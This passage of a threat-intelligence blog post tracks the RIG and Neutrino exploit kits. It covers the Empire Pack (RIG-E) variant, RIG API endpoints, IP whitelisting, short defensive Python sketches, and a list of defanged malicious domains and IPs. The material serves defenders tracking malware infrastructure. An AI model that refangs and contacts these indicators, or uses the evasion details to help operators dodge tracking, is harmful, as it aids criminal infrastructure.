Some might find this interface quite familiar… a look at the favicon will give you a hint.

Picture 16: RIG EK favicon on Empire Pack panel

Picture 17: RIG Panel

It seems the Empire Pack project was conceived upon Angler EK's disappearance and launched around the 14th of August 2016.
I think this launch could be related to the first wave of switches to RIG that occurred around that time. I think Empire Pack is a RIG instance managed by a reseller/load seller with strong underground connections.
RIG-v is a “vip” version of RIG. Now, how exactly those three elements (RIG, RIG-v, Empire Pack) overlap, I don't know. I am aware of three variants of the API to RIG:
  • api.php : historical RIG
  • api3.php : RIG with internal TDS [2016-10-08: this is Empire Pack. It appears to also be using remote_api after this post went live. I flag it as RIG-E]
  • remote_api.php : RIG-v
But Empire Pack might be api3, remote_api, or a bit of both of them.
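For tracking purposes, those API endpoint patterns map naturally onto taxonomy flags. Here is a sketch of how a tracker might tag observed URLs (the `flag_rig_variant` helper is my own, mirroring the flags used in this post):

```python
# Sketch: map an observed RIG API endpoint to the variant flags used in this post.
RIG_API_FLAGS = {
    "api.php": "RIG",           # historical RIG
    "api3.php": "RIG-E",        # RIG with internal TDS (Empire Pack)
    "remote_api.php": "RIG-v",  # "vip" version of RIG
}

def flag_rig_variant(url: str) -> str:
    """Return a taxonomy tag for a RIG API URL, or 'unknown'."""
    endpoint = url.rstrip("/").rsplit("/", 1)[-1].split("?", 1)[0]
    return RIG_API_FLAGS.get(endpoint, "unknown")
```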

By the way, RIG has also (as Nuclear and Angler ended up doing) added IP whitelisting on API calls to avoid easy EK tracking from there :-" (only whitelisted IPs - from declared redirectors or external TDSes - can query the API to get the current landing).
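The effect of that whitelisting can be illustrated with a trivial sketch (hypothetical IPs and helper; the point is that non-whitelisted callers, such as EK trackers, simply get nothing back):

```python
# Sketch: IP whitelisting on EK API calls. Callers not declared by the
# customer (e.g. trackers replaying the API) get a 404 instead of a landing.
WHITELIST = {"185.117.73.80", "203.0.113.7"}  # hypothetical redirector/TDS IPs

def api_response(client_ip: str) -> int:
    """Return an HTTP status: landing for whitelisted IPs, 404 otherwise."""
    return 200 if client_ip in WHITELIST else 404
```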


Let’s just conclude this post with statistics pages of two Neutrino threads

Picture 18: Neutrino stats - Aus focused thread - 2016-07-15

Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09

We will be known forever by the tracks we leave
Santee Sioux Tribe

Some IOCs

2016-10-01 | u0e1.wzpub4q7q[.]top | 185.117.73.80 | RIG-E (Empire Pack)
2016-10-01 | adspixel[.]site | 45.63.100.224 | NeutrAds Redirector
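The indicators above are defanged with the usual `[.]` convention; before feeding them to a blocklist they need to be refanged. A small helper (this is a common handling convention, not part of the original post):

```python
def refang(ioc: str) -> str:
    """Turn a defanged IOC like 'adspixel[.]site' back into its usable form."""
    # Restore dots and (when present) the hxxp scheme convention.
    return ioc.replace("[.]", ".").replace("hxxp", "http")
```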


Thanks to Malc0de, Joseph C Chen (Trendmicro) and Will Metcalf (EmergingThreat/Proofpoint) for their input and help on multiple aspects of this post.


2016-10-03:
Removed the limitation to KOR and TWN for Neutrino-v use by NeutrAds, as Trendmicro informed me they are now seeing them in other geos.
Added an explanation about the IP whitelisting on the RIG API (it was not clear).
2016-10-08 :
Updated with gained information on Empire Pack
2016-11-01 :
Standard RIG is now also using the pattern introduced last week by RIG-v. It's now at version 4.

RIG panel
The only instance of RIG using the old pattern is Empire Pack (which previously could be guessed by its domain patterns).
2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)

RIG-E Behavioral
RIG-v has increased its filtering on IP ranges and added a pre-landing to filter out non-IE traffic.

2016-12-03 RIG-v Pre-landing

Read More

RIG’s Facelift - 2016-09-30 - SpiderLabs
Is it the End of Angler ? - 2016-06-11
Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01
Hello Neutrino ! - 2013-06-07
The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05